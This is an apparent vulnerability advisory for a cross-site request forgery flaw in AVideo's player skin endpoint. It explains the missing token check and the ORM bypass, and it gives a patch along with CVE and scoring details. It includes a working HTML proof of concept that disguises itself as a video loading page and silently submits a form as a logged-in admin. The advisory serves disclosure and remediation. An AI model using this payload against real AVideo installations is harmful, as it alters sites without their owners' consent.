Severity: Medium
CWE: CWE-352 (Cross-Site Request Forgery)
The player skin configuration endpoint at admin/playerUpdate.json.php does not validate CSRF tokens. The plugins table is explicitly excluded from the ORM's domain-based security check via ignoreTableSecurityCheck(), removing the only other layer of defense. Combined with SameSite=None cookies, a cross-origin POST can modify the video player appearance on the entire platform.
In admin/playerUpdate.json.php at line 17, the player skin is set directly from POST data:
$pluginDO->skin = $_POST['skin'];
No CSRF token is validated anywhere in the endpoint. Normally, the ORM layer performs a Referer/Origin domain check as a secondary defense against cross-origin writes. However, the plugins table is registered in ignoreTableSecurityCheck(), which explicitly bypasses this ORM-level protection for plugin configuration.
AVideo's session cookies are configured with SameSite=None, meaning the admin's authenticated session cookie is automatically included in cross-origin POST requests from any website.
An attacker can craft a page that, when visited by an authenticated admin, silently changes the player skin to any value, including potentially invalid or disruptive configurations.
Host the following HTML on an attacker-controlled domain:
<!DOCTYPE html>
<html>
<head><title>CSRF Player Skin</title></head>
<body>
<h1>Loading video...</h1>
<form id="csrf" method="POST"
action="https://your-avideo-instance.com/admin/playerUpdate.json.php">
<input type="hidden" name="skin" value="minimalist" />
</form>
<script>
document.getElementById("csrf").submit();
</script>
</body>
</html>
When an authenticated admin visits this page, the platform's player skin is changed without their knowledge.
ignoreTableSecurityCheck() means there is no fallback protectionAdd CSRF token validation at admin/playerUpdate.json.php, before processing POST data:
// admin/playerUpdate.json.php (before line 17)
if (!isGlobalTokenValid()) {
die('{"error":"Invalid CSRF token"}');
}
Found by aisafe.io
| Score | Percentile |
|---|---|
| 0.02% | 4.61% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 4.3 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-4q27-4rrq-fx95 ↗ |
| CVE | CVE-2026-35181 ↗ |
| CWE id | Name |
|---|---|
| CWE-352 | Cross-Site Request Forgery (CSRF) |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| composer | wwbn/avideo | <= 26.0 | — | — |